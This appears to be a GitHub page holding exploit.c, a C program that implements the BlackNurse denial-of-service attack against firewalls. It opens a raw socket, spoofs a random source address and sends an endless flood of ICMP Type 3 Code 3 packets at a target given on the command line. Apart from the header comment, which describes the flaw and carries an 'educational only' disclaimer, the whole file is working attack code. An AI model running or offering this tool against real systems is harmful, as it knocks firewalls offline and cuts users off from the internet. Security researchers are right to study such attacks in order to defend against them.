-
Notifications
You must be signed in to change notification settings - Fork 24
/
Copy pathexploit.c
165 lines (137 loc) · 5.35 KB
/
exploit.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
/**
* Black Nurse Exploit
*
* by opsxcq (github.com/opsxcq)
* this flaw was discovered by Kenneth B. Jørgensen and Lenny Hansson.
*
* Blacknurse is a low bandwidth ICMP attack that is capable of doing denial of service to well known
* firewalls. Most ICMP attacks that we see are based on ICMP Type 8 Code 0 also called a ping flood
* attack. BlackNurse is based on ICMP with Type 3 Code 3 packets. We know that when a user has allowed
* ICMP Type 3 Code 3 to outside interfaces, the BlackNurse attack becomes highly effective even at low
* bandwidth. Low bandwidth is in this case around 15-18 Mbit/s. This is to achieve the volume of packets
* needed which is around 40 to 50K packets per second. It does not matter if you have a 1 Gbit/s Internet
* connection. The impact we see on different firewalls is typically high CPU loads. When an attack is
* ongoing, users from the LAN side will no longer be able to send/receive traffic to/from the Internet.
* All firewalls we have seen recover when the attack stops.
*
* This or previous program is for Educational purpose ONLY. Do not use it without permission.
* The usual disclaimer applies, especially the fact that me (opsxcq) is not liable for any damages
* caused by direct or indirect use of the information or functionality provided by these programs.
* The author or any Internet provider bears NO responsibility for content or misuse of these programs
* or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
* system crash, system compromise, etc.) caused by the use of these programs is not opsxcq's responsibility.
*
**/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/time.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#define PAYLOAD_SIZE 512
typedef unsigned char u8;
typedef unsigned short int u16;
unsigned short icmpChecksum(unsigned short *ptr, int nbytes){
register long sum;
u_short oddbyte;
register u_short answer;
sum = 0;
while (nbytes > 1) {
sum += *ptr++;
nbytes -= 2;
}
if (nbytes == 1) {
oddbyte = 0;
*((u_char *) & oddbyte) = *(u_char *) ptr;
sum += oddbyte;
}
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
answer = ~sum;
return (answer);
}
int main(int argc, char **argv){
printf("[+] Black Nurse exploit\n");
if (argc < 1){
printf("[-] Missing argument, target");
printf(" Usage: %s <target>\n", argv[0]);
return -1;
}
int currentCode, sent, sentSize;
int option = 1;
// Random source, let's not care about it
unsigned long source = rand();
// Parse target in argv[1]
unsigned long target = inet_addr(argv[1]);
// Create our raw socket
int sockfd = socket (AF_INET, SOCK_RAW, IPPROTO_RAW);
if (sockfd < 0){
perror("[-] Can't create socket, are you root ?");
return -1;
}
if (setsockopt (sockfd, IPPROTO_IP, IP_HDRINCL, (const char*)&option, sizeof (option)) == -1){
perror("[-] Can't set socketopts IP_HDRINCL (to set custom options on IPV4 layer)");
return -1;
}
if (setsockopt (sockfd, SOL_SOCKET, SO_BROADCAST, (const char*)&option, sizeof (option)) == -1){
perror("[-] Can't set socketopts for broadcast");
return -1;
}
// Final packet size
int finalPacketSize = sizeof (struct iphdr) + sizeof (struct icmphdr) + PAYLOAD_SIZE;
char *packet = (char *) malloc (finalPacketSize);
if (!packet){
perror("[-] Cannot allocate memory, if you never got this error before, you are lucky !");
close(sockfd);
return -1;
}
// Sanitizing our memory
memset (packet, 0, finalPacketSize);
// Point our IP header to our allocated packet memory block
struct iphdr *ip = (struct iphdr *) packet;
struct icmphdr *icmp = (struct icmphdr *) (packet + sizeof (struct iphdr));
// Set IPv4 header
ip->version = 4;
ip->ihl = 5;
ip->tos = 0;
ip->tot_len = htons (finalPacketSize);
ip->id = rand();
ip->frag_off = 0;
ip->ttl = 255;
ip->protocol = IPPROTO_ICMP;
ip->saddr = source;
ip->daddr = target;
// Set ICMP data
icmp->type = ICMP_DEST_UNREACH;
icmp->code = 0;
icmp->un.echo.sequence = rand();
icmp->un.echo.id = rand();
// Checksum will be calculated later
icmp->checksum = 0;
// Create sockaddr
struct sockaddr_in sockAddress;
sockAddress.sin_family = AF_INET;
sockAddress.sin_addr.s_addr = target;
memset(&sockAddress.sin_zero, 0, sizeof (sockAddress.sin_zero));
puts("[+] Sending packets\n");
// Let the packet storm begin !
while (1){
icmp->code = 3;
memset(packet + sizeof(struct iphdr) + sizeof(struct icmphdr), rand() % 255, PAYLOAD_SIZE);
icmp->checksum = 0;
icmp->checksum = icmpChecksum((unsigned short *)icmp, sizeof(struct icmphdr) + PAYLOAD_SIZE);
if ( (sentSize = sendto(sockfd, packet, finalPacketSize, 0, (struct sockaddr*) &sockAddress, sizeof (sockAddress))) < 1){
perror("[-] Packet send failed\n");
free(packet);
close(sockfd);
return -1;
}
printf("[+] Already sent %d packets\r", ++sent);
fflush(stdout);
}
// Code will never reach this point
free(packet);
close(sockfd);
return 0;
}